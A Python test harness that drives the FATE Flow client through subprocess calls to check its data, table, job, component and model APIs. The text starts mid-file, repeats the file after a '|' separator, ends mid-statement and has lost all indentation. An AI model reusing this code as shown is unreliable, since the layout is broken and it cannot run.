self.error_log('data upload: {}'.format(stdout.get('retmsg')) + '\n')
return self.query_status(stdout.get("jobId"))
except Exception:
return
def data_download(self, table_name, output_path):
download_config = {
"table_name": table_name['table_name'],
"namespace": table_name['namespace'],
"output_path": output_path + '{}download.csv'.format(self.job_id)
}
config_file_path = self.cache_directory + 'download_config.json'
with open(config_file_path, 'w') as fp:
json.dump(download_config, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "download", "-c", config_file_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data download: {}'.format(stdout.get('retmsg')) + '\n')
return self.query_status(stdout.get("jobId"))
except Exception:
return
def data_upload_history(self, conf_file):
self.data_upload(conf_file, table_index=1)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "upload_history", "-limit", "2"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data upload history: {}'.format(stdout.get('retmsg')) + '\n')
if len(stdout.get('data')) == 2:
return stdout.get('retcode')
except Exception:
return
def model_api(self, command, remove_path=None, model_path=None, model_load_conf=None, servings=None):
if model_load_conf is not None:
model_load_conf["job_parameters"].update({"model_id": self.model_id,
"model_version": self.model_version})
if command == 'load':
model_load_path = self.cache_directory + 'model_load_file.json'
with open(model_load_path, 'w') as fp:
json.dump(model_load_conf, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", model_load_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model load: {}'.format(stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
except Exception:
return
elif command == 'bind':
service_id = "".join([str(i) for i in np.random.randint(9, size=8)])
model_load_conf.update({"service_id": service_id, "servings": [servings]})
model_bind_path = self.cache_directory + 'model_load_file.json'
with open(model_bind_path, 'w') as fp:
json.dump(model_load_conf, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", model_bind_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model bind: {}'.format(stdout.get('retmsg')) + '\n')
else:
return stdout.get('retcode')
except Exception:
return
elif command == 'import':
config_data = {
"model_id": self.model_id,
"model_version": self.model_version,
"role": "guest",
"party_id": self.guest_party_id[0],
"file": model_path
}
config_file_path = self.cache_directory + 'model_import.json'
with open(config_file_path, 'w') as fp:
json.dump(config_data, fp)
try:
remove_path = Path(remove_path + self.model_version)
if os.path.isdir(remove_path):
shutil.rmtree(remove_path)
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", config_file_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if not stdout.get('retcode') and os.path.isdir(remove_path):
return 0
else:
self.error_log('model import: {}'.format(stdout.get('retmsg')) + '\n')
except Exception:
return
elif command == 'export':
config_data = {
"model_id": self.model_id,
"model_version": self.model_version,
"role": "guest",
"party_id": self.guest_party_id[0]
}
config_file_path = self.cache_directory + 'model_export.json'
with open(config_file_path, 'w') as fp:
json.dump(config_data, fp)
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", config_file_path, "-o",
self.output_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model export: {}'.format(stdout.get('retmsg')) + '\n')
else:
export_model_path = stdout.get('file')
return stdout.get('retcode'), export_model_path
elif command in ['store', 'restore']:
config_data = {
"model_id": self.model_id,
"model_version": self.model_version,
"role": "guest",
"party_id": self.guest_party_id[0]
}
config_file_path = self.cache_directory + 'model_store.json'
with open(config_file_path, 'w') as fp:
json.dump(config_data, fp)
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", config_file_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model {}: {}'.format(command, stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
def query_status(self, job_id=None):
while True:
time.sleep(5)
status = self.query_job(job_id=job_id)
if status and status in ["waiting", "running", "success"]:
if status and status == "success":
return 0
else:
return
def set_config(self, guest_party_id, host_party_id, arbiter_party_id, path, component_name):
config = get_dict_from_file(path)
config["initiator"]["party_id"] = guest_party_id[0]
config["role"]["guest"] = guest_party_id
config["role"]["host"] = host_party_id
if "arbiter" in config["role"]:
config["role"]["arbiter"] = arbiter_party_id
self.guest_party_id = guest_party_id
self.host_party_id = host_party_id
self.arbiter_party_id = arbiter_party_id
conf_file_path = self.cache_directory + 'conf_file.json'
with open(conf_file_path, 'w') as fp:
json.dump(config, fp)
self.conf_path = conf_file_path
return config['component_parameters']['common'][component_name]['max_iter']
def judging_state(retcode):
if not retcode and retcode is not None:
return 'success'
else:
return 'failed'
def run_test_api(config_json, namespace):
output_path = './output/flow_test_data/'
os.makedirs(os.path.dirname(output_path), exist_ok=True)
fate_flow_path = config_json['data_base_dir'].parent.parent / 'fate_flow' / 'fate_flow_client.py'
if not fate_flow_path.exists():
raise FileNotFoundError(f'fate_flow not found. filepath: {fate_flow_path}')
test_api = TestModel(config_json['data_base_dir'], str(fate_flow_path), config_json['component_name'], namespace)
test_api.dsl_path = config_json['train_dsl_path']
test_api.cache_directory = config_json['cache_directory']
test_api.output_path = str(os.path.abspath(output_path)) + '/'
conf_path = config_json['train_conf_path']
guest_party_id = config_json['guest_party_id']
host_party_id = config_json['host_party_id']
arbiter_party_id = config_json['arbiter_party_id']
upload_file_path = config_json['upload_file_path']
model_file_path = config_json['model_file_path']
conf_file = get_dict_from_file(upload_file_path)
serving_connect_bool = serving_connect(config_json['serving_setting'])
remove_path = str(config_json['data_base_dir']).split("python")[
0] + '/model_local_cache/guest#{}#arbiter-{}#guest-{}#host-{}#model/'.format(
guest_party_id[0], arbiter_party_id[0], guest_party_id[0], host_party_id[0])
max_iter = test_api.set_config(guest_party_id, host_party_id, arbiter_party_id, conf_path,
config_json['component_name'])
data = PrettyTable()
data.set_style(ORGMODE)
data.field_names = ['data api name', 'status']
data.add_row(['data upload', judging_state(test_api.data_upload(upload_file_path))])
data.add_row(['data download', judging_state(test_api.data_download(conf_file, output_path))])
data.add_row(
['data upload history', judging_state(test_api.data_upload_history(upload_file_path))])
print(data.get_string(title="data api"))
table = PrettyTable()
table.set_style(ORGMODE)
table.field_names = ['table api name', 'status']
table.add_row(['table info', judging_state(test_api.table_api('table_info', conf_file))])
table.add_row(['delete table', judging_state(test_api.table_api('table_delete', conf_file))])
print(table.get_string(title="table api"))
job = PrettyTable()
job.set_style(ORGMODE)
job.field_names = ['job api name', 'status']
job.add_row(['job stop', judging_state(test_api.job_api('stop_job'))])
job.add_row(['job submit', judging_state(test_api.submit_job(stop=False))])
job.add_row(['job query', judging_state(False if test_api.query_job() == "success" else True)])
job.add_row(['job data view', judging_state(test_api.job_api('data_view_query'))])
job.add_row(['job config', judging_state(test_api.job_config(max_iter=max_iter))])
job.add_row(['job log', judging_state(test_api.job_api('job_log'))])
task = PrettyTable()
task.set_style(ORGMODE)
task.field_names = ['task api name', 'status']
task.add_row(['task query', judging_state(test_api.query_task())])
print(task.get_string(title="task api"))
component = PrettyTable()
component.set_style(ORGMODE)
component.field_names = ['component api name', 'status']
component.add_row(['output data', judging_state(test_api.component_api('component_output_data'))])
component.add_row(['output table', judging_state(test_api.component_api('component_output_data_table'))])
component.add_row(['output model', judging_state(test_api.component_api('component_output_model'))])
component.add_row(
['component parameters', judging_state(test_api.component_api('component_parameters', max_iter=max_iter))])
component.add_row(['metrics', judging_state(test_api.component_api('component_metrics'))])
component.add_row(['metrics all', judging_state(test_api.component_api('component_metric_all'))])
model = PrettyTable()
model.set_style(ORGMODE)
model.field_names = ['model api name', 'status']
if not config_json.get('component_is_homo') and serving_connect_bool:
model_load_conf = get_dict_from_file(model_file_path)
model_load_conf["initiator"]["party_id"] = guest_party_id
model_load_conf["role"].update(
{"guest": [guest_party_id], "host": [host_party_id], "arbiter": [arbiter_party_id]})
model.add_row(['model load', judging_state(test_api.model_api('load', model_load_conf=model_load_conf))])
model.add_row(['model bind', judging_state(
test_api.model_api('bind', model_load_conf=model_load_conf, servings=config_json['serving_setting']))])
status, model_path = test_api.model_api('export')
model.add_row(['model export', judging_state(status)])
model.add_row(['model import', (judging_state(
test_api.model_api('import', remove_path=remove_path, model_path=model_path)))])
model.add_row(['model store', (judging_state(test_api.model_api('store')))])
model.add_row(['model restore', (judging_state(test_api.model_api('restore')))])
print(model.get_string(title="model api"))
component.add_row(['metrics delete', judging_state(test_api.component_api('component_metric_delete'))])
print(component.get_string(title="component api"))
test_api.submit_job()
test_api.submit_job()
test_api.submit_job()
job.add_row(['clean job', judging_state(test_api.job_api('clean_job'))])
job.add_row(['clean queue', judging_state(test_api.job_api('clean_queue'))])
print(job.get_string(title="job api"))
print('Please check the error content: {}'.format(test_api.error_log(None)))
| import json
import os
import sys
import shutil
import time
import subprocess
import numpy as np
from pathlib import Path
from prettytable import PrettyTable, ORGMODE
from fate_test.flow_test.flow_process import get_dict_from_file, serving_connect
class TestModel(object):
def __init__(self, data_base_dir, fate_flow_path, component_name, namespace):
self.conf_path = None
self.dsl_path = None
self.job_id = None
self.model_id = None
self.model_version = None
self.guest_party_id = None
self.host_party_id = None
self.arbiter_party_id = None
self.output_path = None
self.cache_directory = None
self.data_base_dir = data_base_dir
self.fate_flow_path = fate_flow_path
self.component_name = component_name
self.python_bin = sys.executable or 'python3'
self.request_api_info_path = f'./logs/{namespace}/cli_exception.log'
os.makedirs(os.path.dirname(self.request_api_info_path), exist_ok=True)
def error_log(self, retmsg):
if retmsg is None:
return os.path.abspath(self.request_api_info_path)
with open(self.request_api_info_path, "a") as f:
f.write(retmsg)
def submit_job(self, stop=True):
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "submit_job", "-d", self.dsl_path,
"-c", self.conf_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job submit: {}'.format(stdout.get('retmsg')) + '\n')
self.job_id = stdout.get("jobId")
self.model_id = stdout.get("data").get("model_info").get("model_id")
self.model_version = stdout.get("data").get("model_info").get("model_version")
if stop:
return
return self.query_status()
except Exception:
return
def job_api(self, command):
if command == 'stop_job':
self.submit_job()
time.sleep(5)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job stop: {}'.format(stdout.get('retmsg')) + '\n')
if self.query_job() == "canceled":
return stdout.get('retcode')
except Exception:
return
elif command == 'job_log':
log_file_dir = os.path.join(self.output_path, 'job_{}_log'.format(self.job_id))
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id, "-o",
log_file_dir], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job log: {}'.format(stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
except Exception:
return
elif command == 'data_view_query':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data view queue: {}'.format(stdout.get('retmsg')) + '\n')
if len(stdout.get("data")) == len(list(get_dict_from_file(self.dsl_path)['components'].keys())) - 1:
return stdout.get('retcode')
except Exception:
return
elif command == 'clean_job':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('clean job: {}'.format(stdout.get('retmsg')) + '\n')
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "component_metrics", "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
metric, stderr = subp.communicate()
metric = json.loads(metric.decode("utf-8"))
if not metric.get('data'):
return stdout.get('retcode')
except Exception:
return
elif command == 'clean_queue':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('clean queue: {}'.format(stdout.get('retmsg')) + '\n')
if not self.query_job(queue=True):
return stdout.get('retcode')
except Exception:
return
def query_job(self, job_id=None, queue=False):
if job_id is None:
job_id = self.job_id
time.sleep(1)
try:
if not queue:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "query_job", "-j", job_id],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if not stdout.get('retcode'):
return stdout.get("data")[0].get("f_status")
else:
self.error_log('query job: {}'.format(stdout.get('retmsg')) + '\n')
else:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "query_job", "-j", job_id, "-s",
"waiting"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if not stdout.get('retcode'):
return len(stdout.get("data"))
except Exception:
return
def job_config(self, max_iter):
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "job_config", "-j", self.job_id, "-r",
"guest", "-p", str(self.guest_party_id[0]), "-o", self.output_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('job config: {}'.format(stdout.get('retmsg')) + '\n')
job_conf_path = stdout.get('directory') + '/runtime_conf.json'
job_conf = get_dict_from_file(job_conf_path)
if max_iter == job_conf['component_parameters']['common'][self.component_name]['max_iter']:
return stdout.get('retcode')
except Exception:
return
def query_task(self):
try:
subp = subprocess.Popen(
[self.python_bin, self.fate_flow_path, "-f", "query_task", "-j", self.job_id, "-r", "guest",
"-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('task query: {}'.format(stdout.get('retmsg')) + '\n')
status = stdout.get("data")[0].get("f_status")
if status == "success":
return stdout.get('retcode')
except Exception:
return
def component_api(self, command, max_iter=None):
component_output_path = os.path.join(self.output_path, 'job_{}_output_data'.format(self.job_id))
if command == 'component_output_data':
try:
subp = subprocess.Popen(
[self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id, "-r",
"guest", "-p", str(self.guest_party_id[0]), "-cpn", self.component_name, "-o",
component_output_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component output data: {}'.format(stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
except Exception:
return
elif command == 'component_output_data_table':
try:
subp = subprocess.Popen(
[self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id, "-r",
"guest", "-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component output data table: {}'.format(stdout.get('retmsg')) + '\n')
table = {'table_name': stdout.get("data")[0].get("table_name"),
'namespace': stdout.get("data")[0].get("namespace")}
if not self.table_api('table_info', table):
return stdout.get('retcode')
except Exception:
return
elif command == 'component_output_model':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-r", "guest",
"-j", self.job_id, "-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component output model: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get("data"):
return stdout.get('retcode')
except Exception:
return
elif command == 'component_parameters':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", self.component_name],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component parameters: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get('data', {}).get('ComponentParam', {}).get('max_iter', {}) == max_iter:
return stdout.get('retcode')
except Exception:
return
elif command == 'component_metrics':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component metrics: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get("data"):
metrics_file = self.output_path + '{}_metrics.json'.format(self.job_id)
with open(metrics_file, 'w') as fp:
json.dump(stdout.get("data"), fp)
return stdout.get('retcode')
except Exception:
return
elif command == 'component_metric_all':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component metric all: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get("data"):
metric_all_file = self.output_path + '{}_metric_all.json'.format(self.job_id)
with open(metric_all_file, 'w') as fp:
json.dump(stdout.get("data"), fp)
return stdout.get('retcode')
except Exception:
return
elif command == 'component_metric_delete':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-j",
self.job_id, "-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn",
'evaluation_0'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('component metric delete: {}'.format(stdout.get('retmsg')) + '\n')
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "component_metrics", "-j", self.job_id,
"-r", "guest", "-p", str(self.guest_party_id[0]), "-cpn", 'evaluation_0'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
metric, stderr = subp.communicate()
metric = json.loads(metric.decode("utf-8"))
if not metric.get('data'):
return stdout.get('retcode')
except Exception:
return
def table_api(self, command, table_name):
if command == 'table_info':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-t",
table_name['table_name'], "-n", table_name['namespace']],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('table info: {}'.format(stdout.get('retmsg')) + '\n')
if stdout.get('data')['namespace'] == table_name['namespace'] and \
stdout.get('data')['table_name'] == table_name['table_name']:
return stdout.get('retcode')
except Exception:
return
elif command == 'table_delete':
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-t",
table_name['table_name'], "-n", table_name['namespace']],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('table delete: {}'.format(stdout.get('retmsg')) + '\n')
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "table_delete", "-t",
table_name['table_name'], "-n", table_name['namespace']],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
return 0
except Exception:
return
def data_upload(self, upload_path, table_index=None):
upload_file = get_dict_from_file(upload_path)
upload_file['file'] = str(self.data_base_dir.joinpath(upload_file['file']).resolve())
upload_file['drop'] = 1
upload_file['use_local_data'] = 0
if table_index is not None:
upload_file['table_name'] = f'{upload_file["file"]}_{table_index}'
upload_path = self.cache_directory + 'upload_file.json'
with open(upload_path, 'w') as fp:
json.dump(upload_file, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "upload", "-c", upload_path, "-drop", "1"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data upload: {}'.format(stdout.get('retmsg')) + '\n')
return self.query_status(stdout.get("jobId"))
except Exception:
return
def data_download(self, table_name, output_path):
download_config = {
"table_name": table_name['table_name'],
"namespace": table_name['namespace'],
"output_path": output_path + '{}download.csv'.format(self.job_id)
}
config_file_path = self.cache_directory + 'download_config.json'
with open(config_file_path, 'w') as fp:
json.dump(download_config, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "download", "-c", config_file_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data download: {}'.format(stdout.get('retmsg')) + '\n')
return self.query_status(stdout.get("jobId"))
except Exception:
return
def data_upload_history(self, conf_file):
self.data_upload(conf_file, table_index=1)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", "upload_history", "-limit", "2"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('data upload history: {}'.format(stdout.get('retmsg')) + '\n')
if len(stdout.get('data')) == 2:
return stdout.get('retcode')
except Exception:
return
def model_api(self, command, remove_path=None, model_path=None, model_load_conf=None, servings=None):
if model_load_conf is not None:
model_load_conf["job_parameters"].update({"model_id": self.model_id,
"model_version": self.model_version})
if command == 'load':
model_load_path = self.cache_directory + 'model_load_file.json'
with open(model_load_path, 'w') as fp:
json.dump(model_load_conf, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", model_load_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model load: {}'.format(stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
except Exception:
return
elif command == 'bind':
service_id = "".join([str(i) for i in np.random.randint(9, size=8)])
model_load_conf.update({"service_id": service_id, "servings": [servings]})
model_bind_path = self.cache_directory + 'model_load_file.json'
with open(model_bind_path, 'w') as fp:
json.dump(model_load_conf, fp)
try:
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", model_bind_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model bind: {}'.format(stdout.get('retmsg')) + '\n')
else:
return stdout.get('retcode')
except Exception:
return
elif command == 'import':
config_data = {
"model_id": self.model_id,
"model_version": self.model_version,
"role": "guest",
"party_id": self.guest_party_id[0],
"file": model_path
}
config_file_path = self.cache_directory + 'model_import.json'
with open(config_file_path, 'w') as fp:
json.dump(config_data, fp)
try:
remove_path = Path(remove_path + self.model_version)
if os.path.isdir(remove_path):
shutil.rmtree(remove_path)
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", config_file_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if not stdout.get('retcode') and os.path.isdir(remove_path):
return 0
else:
self.error_log('model import: {}'.format(stdout.get('retmsg')) + '\n')
except Exception:
return
elif command == 'export':
config_data = {
"model_id": self.model_id,
"model_version": self.model_version,
"role": "guest",
"party_id": self.guest_party_id[0]
}
config_file_path = self.cache_directory + 'model_export.json'
with open(config_file_path, 'w') as fp:
json.dump(config_data, fp)
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", config_file_path, "-o",
self.output_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model export: {}'.format(stdout.get('retmsg')) + '\n')
else:
export_model_path = stdout.get('file')
return stdout.get('retcode'), export_model_path
elif command in ['store', 'restore']:
config_data = {
"model_id": self.model_id,
"model_version": self.model_version,
"role": "guest",
"party_id": self.guest_party_id[0]
}
config_file_path = self.cache_directory + 'model_store.json'
with open(config_file_path, 'w') as fp:
json.dump(config_data, fp)
subp = subprocess.Popen([self.python_bin, self.fate_flow_path, "-f", command, "-c", config_file_path],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = subp.communicate()
stdout = json.loads(stdout.decode("utf-8"))
if stdout.get('retcode'):
self.error_log('model {}: {}'.format(command, stdout.get('retmsg')) + '\n')
return stdout.get('retcode')
def query_status(self, job_id=None):
while True:
time.sleep(5)
status = self.query_job(job_id=job_id)
if status and status in ["waiting", "running", "success"]:
if status and status == "success":
return 0
else:
return
def set_config(self, guest_party_id, host_party_id, arbiter_party_id, path, component_name):
config = get_dict_from_file(path)
config["initiator"]["party_id"] = guest_party_id[0]
config["role"]["guest"] = guest_party_id
config["role"]["host"] = host_party_id
if "arbiter" in config["role"]:
config["role"]["arbiter"] = arbiter_party_id
self.guest_party_id = guest_party_id
self.host_party_id = host_party_id
self.arbiter_party_id = arbiter_party_id
conf_file_path = self.cache_directory + 'conf_file.json'
with open(conf_file_path, 'w') as fp:
json.dump(config, fp)
self.conf_path = conf_file_path
return config['component_parameters']['common'][component_name]['max_iter']
def judging_state(retcode):
if not retcode and retcode is not None:
return 'success'
else:
return 'failed'
def run_test_api(config_json, namespace):
output_path = './output/flow_test_data/'
os.makedirs(os.path.dirname(output_path), exist_ok=True)
fate_flow_path = config_json['data_base_dir'].parent.parent / 'fate_flow' / 'fate_flow_client.py'
if not fate_flow_path.exists():
raise FileNotFoundError(f'fate_flow not found. filepath: {fate_flow_path}')
test_api = TestModel(config_json['data_base_dir'], str(fate_flow_path), config_json['component_name'], namespace)
test_api.dsl_path = config_json['train_dsl_path']
test_api.cache_directory = config_json['cache_directory']
test_api.output_path = str(os.path.abspath(output_path)) + '/'
conf_path = config_json['train_conf_path']
guest_party_id = config_json['guest_party_id']
host_party_id = config_json['host_party_id']
arbiter_party_id = config_json['arbiter_party_id']
upload_file_path = config_json['upload_file_path']
model_file_path = config_json['model_file_path']
conf_file = get_dict_from_file(upload_file_path)
serving_connect_bool = serving_connect(config_json['serving_setting'])
remove_path = str(config_json['data_base_dir']).split("python")[
0] + '/model_local_cache/guest#{}#arbiter-{}#guest-{}#host-{}#model/'.format(
guest_party_id[0], arbiter_party_id[0], guest_party_id[0], host_party_id[0])
max_iter = test_api.set_config(guest_party_id, host_party_id, arbiter_party_id, conf_path,
config_json['component_name'])
data = PrettyTable()
data.set_style(ORGMODE)
data.field_names = ['data api name', 'status']
data.add_row(['data upload', judging_state(test_api.data_upload(upload_file_path))])
data.add_row(['data download', judging_state(test_api.data_download(conf_file, output_path))])
data.add_row(
['data upload history', judging_state(test_api.data_upload_history(upload_file_path))])
print(data.get_string(title="data api"))
table = PrettyTable()
table.set_style(ORGMODE)
table.field_names = ['table api name', 'status']
table.add_row(['table info', judging_state(test_api.table_api('table_info', conf_file))])
table.add_row(['delete table', judging_state(test_api.table_api('table_delete', conf_file))])
print(table.get_string(title="table api"))
job = PrettyTable()
job.set_style(ORGMODE)
job.field_names = ['job api name', 'status']
job.add_row(['job stop', judging_state(test_api.job_api('stop_job'))])
job.add_row(['job submit', judging_state(test_api.submit_job(stop=False))])
job.add_row(['job query', judging_state(False if test_api.query_job() == "success" else True)])
job.add_row(['job data view', judging_state(test_api.job_api('data_view_query'))])
job.add_row(['job config', judging_state(test_api.job_config(max_iter=max_iter))])
job.add_row(['job log', judging_state(test_api.job_api('job_log'))])
task = PrettyTable()
task.set_style(ORGMODE)
task.field_names = ['task api name', 'status']
task.add_row(['task query', judging_state(test_api.query_task())])
print(task.get_string(title="task api"))
component = PrettyTable()
component.set_style(ORGMODE)
component.field_names = ['component api name', 'status']
component.add_row(['output data', judging_state(test_api.component_api('component_output_data'))])
component.add_row(['output table', judging_state(test_api.component_api('component_output_data_table'))])
component.add_row(['output model', judging_state(test_api.component_api('component_output_model'))])
component.add_row(
